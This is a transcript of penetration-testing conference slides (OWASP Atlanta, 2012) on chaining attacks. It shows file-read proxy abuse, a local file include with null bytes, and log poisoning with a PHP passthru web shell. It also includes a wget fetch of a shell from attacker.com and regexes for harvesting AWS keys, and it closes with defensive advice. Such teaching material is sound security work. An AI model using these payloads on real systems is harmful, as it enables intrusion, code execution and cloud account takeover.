Attack Chaining: Advanced Maneuvers for Hack Fu
4 likes13,815 views
The document outlines advanced attack chaining techniques for penetration testing, demonstrating a step-by-step process of exploiting vulnerabilities in web applications and cloud infrastructures. It emphasizes the risks associated with insecure configurations, exposure of sensitive information, and the potential consequences of such breaches, particularly on Amazon AWS services. Key strategies for prevention and improvement, including the implementation of defense-in-depth and strategic security policies, are also discussed.
![Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///var/www/sites/vuln.com/
docroot/dir/include/controller.php
?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] :
$config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] :
$config['action'];
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile)
exit;
?
20](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-20-320.jpg)
![Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///var/www/sites/vuln.com/
docroot/dir/include/controller.php
?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] :
$config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] :
$config['action'];
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile)
exit;
?
24](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-24-320.jpg)
![Step 11 – Where To Stick It?
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/logs/vuln.com_
error_log
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat.jpg, referer:
http://www.vuln.com/
27](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-27-320.jpg)
![Step 12 – Poison Logs
?
echo 'pre';
passthru($_GET['cmd']);
echo '/pre';
?
30](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-30-320.jpg)
![Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/logs/vuln.com_
error_log
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat.jpg,
referer: http://www.vuln.com/
31](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-31-320.jpg)
![Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/logs/vuln.com_
error_log
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat.jpg,
referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat-attack.jpg,
referer: ? echo 'pre';passthru(
$_GET['cmd']);echo 'pre'; ?
32](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-32-320.jpg)
![Step 17 – I
want
more!
ec2[^d]['][A-Z0-9]{20}[']
ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}[']
ec2.*['][A-Z0-9]{20}[']
ec2(D)*['][A-Z0-9]{20}[']
amazon.*['][A-Z0-9]{20}[']
(amazon|ec2).*['][A-Z0-9]{20}[']
amazon(D)*['][A-Z0-9]{20}[']
access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40}
amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}[']
aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}[']
amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}[']
secret.*['][A-Za-z0-9+/]{40}[']
['][A-Za-z0-9+/]{40}['].*amazon
39](https://image.slidesharecdn.com/sl-owaspatlmay2012-attackchaining-120605122710-phpapp02/85/Attack-Chaining-Advanced-Maneuvers-for-Hack-Fu-39-320.jpg)
Attack Chaining: Advanced Maneuvers for Hack Fu
- 1. Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL 31 May 2012
- 2. About Us WHO ARE THES DUDES? • Rob • Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2
- 3. Penetration Test vs. Vulnerability Assessment 3
- 4. vs. 4
- 5. Simulate a real world attack against a target network or application. - EVERYBODY 5
- 6. It answers the question, “could someone break in?” 6
- 7. Penetration Testing Exploit & Penetrate Information Gathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
- 8. Pen Testing Scenario • Web application penetration test • Cloud-based infrastructure hosts multiple sites • Out-sourced PHP development to many contractors • Determine attackers ability to compromise PII or infrastructure 8
- 9. Step 1 – Explore 9
- 10. Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10
- 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11
- 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12
- 13. Attack Chaining – Maneuver 1 13
- 14. Attack Chaining – Maneuver 1 14
- 15. Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15
- 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16
- 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17
- 18. Step 7 – Back to DirBuster 18
- 19. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19
- 20. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 20
- 21. Attack Chaining – Maneuver 2 21
- 22. Attack Chaining – Maneuver 2 22
- 23. Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23
- 24. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 24
- 25. Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25
- 26. Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26
- 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27
- 28. Step 12 – Poison Logs 28
- 29. Step 12 – Poison Logs 29
- 30. Step 12 – Poison Logs ? echo 'pre'; passthru($_GET['cmd']); echo '/pre'; ? 30
- 31. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31
- 32. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo 'pre';passthru( $_GET['cmd']);echo 'pre'; ? 32
- 33. Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33
- 34. Step 14 – Execute Code ? echo 'pre'; passthru('ls'); echo '/pre'; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34
- 35. Attack Chaining – Maneuver 3 35
- 36. Attack Chaining – Maneuver 3 36
- 37. Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php; 37
- 38. Step 16 – Enjoy! 38
- 39. Step 17 – I want more! ec2[^d]['][A-Z0-9]{20}['] ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] ec2.*['][A-Z0-9]{20}['] ec2(D)*['][A-Z0-9]{20}['] amazon.*['][A-Z0-9]{20}['] (amazon|ec2).*['][A-Z0-9]{20}['] amazon(D)*['][A-Z0-9]{20}['] access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40} amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}['] aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] secret.*['][A-Za-z0-9+/]{40}['] ['][A-Za-z0-9+/]{40}['].*amazon 39
- 40. Step 18 – Amazon AWS Regex $this-‐amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628', $aws_key = '8AFB5AF55D1E6620EE1'; define('AMAZON_KEY', '372B8E408D1484C538F'); if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884'); //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C'); define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC'); 40
- 41. Step 19 – AWS Takeover 41
- 42. Step 20 – Make It Your Own 42
- 43. Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1. Found 8 Amazon Secret Keys to access Amazon S3 2. Found that 2 of the 8 have administrator access to Amazon EC2 3. Attacker launches 100 Extra Large Clusters $1,049,000 43
- 44. Take Them Off The Web CRI TICAL EXPOSURE 1. Found 8 Amazon Secret Keys to access Amazon S3 2. Found that 2 of the 8 have administrator access to Amazon EC2 3. Attacker shuts down and deletes all servers and backups permanently PRICELESS 44
- 45. Attack Chaining – Hack Fu 45
- 46. Attack Chaining – Hack Fu 46
- 47. Why Is This Happening? 1. Local File Include 4. Insecure Credential • File Read Only Storage • Code Execution 5. Overly Permissive 2. Null Byte Injection Amazon AWS Keys 3. Log Poisoning 6. Sensitive Information Disclosure 47
- 48. Web à Mass Malware Deployment 48
- 49. Web à Data Center Compromise 49
- 50. Web à Internal Network Compromise 50
- 51. Internal Assessmentà SSN Bank #’s 51
- 52. Infrastructure Review 52
- 53. Step 1 – Target Wireless 53
- 54. Step 1 – Target Wireless 54
- 55. Step 2 – Port Scan 55
- 56. Step 3 – Test Default Creds 56
- 57. Infrastructure Apocalypse 57
- 58. Step 4 – Control AP 58
- 59. Step 5 – Read All E-mail 59
- 60. Step 6 – Listen To VOIP 60
- 61. Step 7 – Open All Doors 61
- 62. Step 7 – Open All Doors 62
- 63. 63
- 64. Step 7 – Server Room Door 64
- 65. Is This Real Life? 1. Insecure Wireless 4. Weak Passwords Encryption 5. Sensitive Information 2. Improper Network Disclosure Segmentation 3. Insecure Default Configuration 65
- 66. Protection – How? 1. People 2. Policy 3. Processes 4. Strategic / Tactical Security 5. Defense In-Depth 66
- 67. Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67
- 68. How Do You Get Better? 68
- 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69
- 70. Attack Visualization LIKE BOBBY FISCHER 70
- 72. Thank You 72